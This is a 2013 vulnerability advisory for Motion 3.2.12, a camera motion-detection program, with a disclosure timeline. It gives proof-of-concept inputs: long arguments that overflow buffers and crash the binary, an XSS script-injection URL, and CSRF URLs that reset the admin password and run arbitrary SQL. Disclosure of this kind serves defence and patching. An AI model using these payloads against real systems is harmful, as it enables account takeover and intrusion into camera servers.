Motion 3.2.12 XSS / CSRF / Buffer Overflow / SQL Injection

`Title: Motion 3.2.12 Multiple Vulnerabilities  
Author: xistence - xistence[at]0x90[.]nl  
Date: 26/06/2013  
Vendor page: http://www.lavrsen.dk/foswiki/bin/view/Motion  
Software link: http://www.lavrsen.dk/foswiki/bin/view/Motion/DownloadFiles  
Software description: Motion is a program that monitors the video signal  
from cameras. It is able to detect if a significant part of the picture has  
changed; in other words, it can detect motion.  
Tested on: Kali  
  
  
Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities  
are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.  
  
(0x01) - Buffer Overflows:  
  
Supplying a long filename to the config and pid parameters of the "motion"  
binary will result in a buffer overflow. The cause of this is, is the  
unsafe C function strcpy() where no boundary checking is done to prevent  
overflowing the buffer.  
This in theory could be abused to escalate privileges if the suid/sgid flag  
is set on the motion binary (not default on most operating systems as far  
as I know)  
Below how to replicate the bugs:  
  
1)  
# motion -c `python -c 'print "\x41"*1000'`  
[0] Configfile  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
not fou:  
Segmentation fault  
  
2)  
# motion -p /tmp/`python -c 'print "\x41"*5000'`  
Segmentation fault  
  
  
(0x02) - Cross Site Scripting:  
  
It's possible to execute script code on the client-side browser through the  
"process_id_file" parameter.  
The following Proof of Concept url will display a popup with the text XSS:  
  
http://  
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>  
  
  
(0x03) - Cross Site Request Forgery:  
  
The following urls show that it's's possible to reset a password, change  
the SQL query by sending a complete URL to the victim. If the victim clicks  
on the url, it will execute the command without any further checking.  
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword  
(Set admin password)  
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL  
query)  
  
  
07 Mar 2013: Discovered vulnerabilities  
07 Mar 2013: Filed bug report at  
http://www.lavrsen.dk/foswiki/bin/view/Motion/BugReport2013x03x07x071831  
26 Jun 2013: No contact or updates whatsoever from developer, public release  
`